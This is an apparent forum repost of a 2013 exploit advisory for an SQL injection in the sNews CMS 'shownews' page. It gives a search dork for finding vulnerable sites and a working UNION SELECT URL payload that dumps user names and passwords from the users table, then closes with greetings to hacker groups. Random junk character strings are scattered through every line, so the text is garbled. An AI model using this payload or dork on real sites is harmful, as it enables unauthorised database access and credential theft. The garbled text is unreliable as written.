标题: CMS snews SQL Injection Vulnerability" Y, p& ~0 D( p! L
作者: By onestree
* Y! X7 q0 }/ `9 m2 m+ g下载地址 : http://snewscms.com/ O; s" u w- f3 U2 z
测试平台 : ubuntu 12.10 / win 7
3 B' O# y) X' _* G关键词: inurl:"tanyakan pada rumput yang bergoyang"
. a% g& @: {4 i3 c! ? , A( I' \9 Y% ?9 m. _) h
) \: ~! k& d0 F+ B& L: Q
*************************************************************8 S# h U% } F7 H+ z
. r$ \2 E' [1 k O9 N1 K7 Z
SQL poc:
5 Q- r0 b9 M9 r. S4 ]6 @7 ]
. L$ i5 _0 |7 G3 `http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
* ~& W r0 ?9 |# V3 h9 X & }5 H' d+ c7 z( k
示例6 b. Z& c; }$ [
t! E9 J- O, H$ b. ~) ] s" I! Phttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*; ]* S% e- _. R; h9 K
, |! B; n, G* }: \2 N / q X P' e) T# b) o6 F0 f
致谢:4 S# p9 N' s) n: g( ~: i
! U5 ~! J' B" ^6 L$ H/ r
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
* M; z# }- t' b% ?
2 T$ J# G$ L9 k- E: c/ { indonesiancoder - moeslimh4x0r - go-coder3 V0 ]7 e, j) w
/ N1 \$ k( i6 F# q+ Nspesial my hunny :*: p. W2 M1 G% D* ~, ^3 q- _) I
|
发表于 2013-1-23 08:55:06
收藏
支持
反对